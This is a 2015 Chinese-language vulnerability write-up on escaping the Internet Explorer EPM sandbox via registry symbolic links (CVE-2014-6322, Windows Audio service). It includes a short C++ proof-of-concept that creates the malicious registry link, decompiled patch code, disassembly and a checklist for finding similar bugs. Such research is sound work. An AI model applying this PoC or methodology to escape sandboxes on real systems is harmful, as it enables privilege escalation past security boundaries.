_ _ (_) | | __ ____ __ _ _ _ _ __ ___ _ __ _ __ ___ | |_ \ \ / /\ \/ /| || | | || '_ ` _ \ | '_ \ | '_ \ / _ \| __| \ V / > < | || |_| || | | | | || |_) |_ | | | || __/| |_ \_/ /_/\_\| | \__,_||_| |_| |_|| .__/(_)|_| |_| \___| \__| _/ | | | |__/ |_| /---------------------------------------------------------------------------------------\ |>...................[ IE EPM沙盒逃逸之注册表符号链接攻击 ]...................<| |>......................[ by nEINEI/vxjump.net ]......................<| |>......................[ 2015-09-27 ]......................<| \>...................... [ neineit_at_gmail.com ] ......................>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CVE-2014-6322也是由James forshaw发现的,利用思路与CVE-2013-5045非常相似。 可以参考ProjectZero的公开描述: https://code.google.com/p/google-security-research/issues/detail?id=99&can=1&q=6322 However on closer inspection it seems that there are other users of this registry key. For example it's common to see an Audio key, this isn't created by IE but instead created by the Windows Audio service. At certain times (due to an RPC call from a user) the function CreateLowRightsRegistryKey will be called in audiosrv.dll. This function doesn't have the same protections as introduced in IE. It copies the DACL from the base key onto the Audio key so once the symbolic link has been followed the new key will be directly accessible by the low privileged process. 在AudioSrv服务中,有 CAudioSessionStore::Commit(void) CAudioSessionStore::OpenSessionKey CAudioSessionStore::OpenStoreKey(void) 调用CreateLowRightsRegistryKey创建"Software\\Microsoft\\Internet Explorer\\LowRegistry\\Audio 下第权限键值,通过这个 可以构造符号链接攻击。 PoC : bstr_t linkName = L"\\Registry\\User\\" + sid + L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Audio"; DeleteLink(linkName); LONG res = RegDeleteTreeW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\Audio"); DebugPrintf("Delete: %d", res); bstr_t destName = L"\\Registry\\User\\" + sid + path; MessageBox(0,L"1",L"1",0); CreateLink(linkName, destName, 0); HANDLE hProcess = MyCreateProcess(L"c:\\windows\\system32\\sndvol.exe", L"sndvol"); 修补这个漏洞微软发布了安全公告MS14-071,并发布了KB3005607补丁修复这个漏洞。 这个补丁增加了两个函数,SafeRegCreateKeyEx和DetectRegistryLink。 更新的补丁模块: Audiosrv.dll : ver 6.3.9600.17893 改模块加载在进程svchost.exe , Windows Audio服务 _int32 __userpurge SafeRegCreateKeyEx@(const wchar_t *a1@, HKEY a2@, HKEY *a3@, HKEY Reserved, const unsigned __int16 *a5, DWORD dwOptions, REGSAM samDesired, unsigned __int32 a8, unsigned __int32 a9, struct _SECURITY_ATTRIBUTES *a10, HKEY *a11, unsigned __int32 *a12) { const wchar_t *v12; // edi@1 __int32 result; // eax@6 wchar_t *v14; // eax@7 wchar_t *v15; // esi@7 wchar_t *v16; // eax@8 int v17; // eax@9 CNtDeleteKey *v18; // ecx@12 int v19; // esi@12 CNtDeleteKey *v20; // ST20_4@13 int v21; // esi@14 int v22; // esi@15 HKEY v23; // ecx@17 CNtDeleteKey *v24; // ecx@18 signed int v25; // eax@23 __int32 v26; // esi@24 HKEY *v28; // [sp-4h] [bp-234h]@7 unsigned __int32 *v29; // [sp+0h] [bp-230h]@0 HKEY v30; // [sp+14h] [bp-21Ch]@1 const WCHAR *lpSubKey; // [sp+18h] [bp-218h]@12 DWORD dwDisposition; // [sp+1Ch] [bp-214h]@21 HKEY hKey; // [sp+20h] [bp-210h]@12 wchar_t Dst; // [sp+24h] [bp-20Ch]@11 v30 = a2; v12 = a1; if ( a10 ) a10->nLength = 0; if ( a9 ) *(_DWORD *)a9 = 0; if ( !a1 ) return 87; v28 = a3; v14 = _wcschr(a1, 0x5Cu); v15 = v14; if ( v14 ) { v17 = v14 - v12; if ( (unsigned int)v17 >= 0x104 ) return 87; _wcsncpy_s(&Dst, 0x104u, v12, v17); v16 = &Dst; v12 = v15 + 1; } else { v16 = (wchar_t *)v12; } hKey = 0; lpSubKey = v16; v19 = DetectRegistryLink(v30, v16, &hKey); if ( !(dword_1008E00C & 1) ) { hLibModule = 0; dword_1008E01C = 0; dword_1008E00C |= 1u; atexit(SafeRegCreateKeyEx_::_19_::_dynamic_atexit_destructor_for__delKey__); v18 = v20; } v21 = v19 - 1; if ( !v21 ) { if ( CNtDeleteKey::Init(v18) && !CNtDeleteKey::Delete(v24, hKey) ) { RegCloseKey(hKey); v23 = 0; hKey = 0; goto LABEL_21; } goto LABEL_35; } v22 = v21 - 1; if ( v22 && v22 != 1 ) { LABEL_35: if ( hKey ) RegCloseKey(hKey); return 5; } v23 = hKey; LABEL_21: dwDisposition = 0; if ( v23 ) { v25 = 2; dwDisposition = 2; } else { result = RegCreateKeyExW( v30, lpSubKey, (DWORD)Reserved, (LPWSTR)a5, dwOptions, samDesired, (LPSECURITY_ATTRIBUTES)a8, &hKey, &dwDisposition); if ( result ) return result; v25 = dwDisposition; if ( dwDisposition != 1 ) { v26 = 5; LABEL_34: RegCloseKey(hKey); return v26; } v23 = hKey; } if ( lpSubKey != v12 ) { v26 = SafeRegCreateKeyEx(Reserved, a5, dwOptions, samDesired, a8, a9, a10, v28, v29); goto LABEL_34; } if ( a9 ) *(_DWORD *)a9 = v23; if ( a10 ) a10->nLength = v25; return 0; } 腾讯玄武实验室给出了在这个补丁基础上的绕过思路,不再详细分析,本质思路是抢在RegCreateKeyEx之前创建一个符号链接。 https://xuanwulab.github.io/2015/08/27/Poking-a-Hole-in-the-Patch/ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Pwn2Own2015上360 Vulcan Team Bypass EPM IE11 X64的思路 __int32 __thiscall CAudioSessionStore::OpenStoreKey(CAudioSessionStore *__hidden this) .text:10028F1D call ds:__imp__RegOpenKeyExW@20 ; RegOpenKeyExW(x,x,x,x,x) .text:10028F23 mov esi, eax .text:10028F25 test esi, esi .text:10028F27 jnz loc_1005762E .text:10028F2D mov ecx, [ebp+phkResult] .text:10028F33 mov edx, offset aAudioPolicycon ; "Audio\\PolicyConfig\\PropertyStore" .text:10028F38 push ebx ; unsigned __int16 * .text:10028F39 push 2001Fh ; HKEY .text:10028F3E call ?CreateLowRightsRegistryKey@@YGJPAUHKEY__@@PBGKPAPAU1@@Z ; CreateLowRightsRegistryKey(HKEY__ *,ushort const *,ulong,HKEY__ * *) 看到这个Audio\\PolicyConfig\\PropertyStore,你可能就明白了, 想办法创建符号链接 HKCU\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore--> HKCU\Software\Microsoft\Internet Explorer\Low Rights 触发一个CALL调用在adudiosrv.dll模块的CreateLowRightsRegistryKey函数中 让它创建HKCU\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\* 因为符号链接关系,使得创建了一个进程权限描述在\Low Rights 项下面。 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 漏洞挖掘思路: 1)寻找能够创建符号低权限的注册表调用进程,类似调用CreateLowRightsRegistryKey这样的函数调用。 2)能够通过外部控制来触发类似“CreateLowRightsRegistryKey”的调用 3)能够在sandbox进程权限内创建注册表符号链接到HKCU\Software\Microsoft\Internet Explorer\Low Rights 然而,现在这没有什么用了 :( [0x04] .其它 微软在2015年8月的补丁中禁止了LowIL进程创建注册表符号链接。 在设置注册表符号链接时,内核通过RtlIsSandboxedToken函数判断当前进程令牌是Low IL或AppContainer则直接返回拒绝访问。 目前看,这类攻击将很难奏效,至于还有没有更好的思路进行利用,Mj0011这篇是很好的借鉴思路。http://blogs.360.cn/blog/windows10-mount-point-mitigation-bypass/ 可以预见以后的利用将会越来越困难,是否还有出现取决于攻击者的决心和是否还能继续找到更容易利用的地方。 ---------------------------EOF--------------------------------------------------------------------------------------------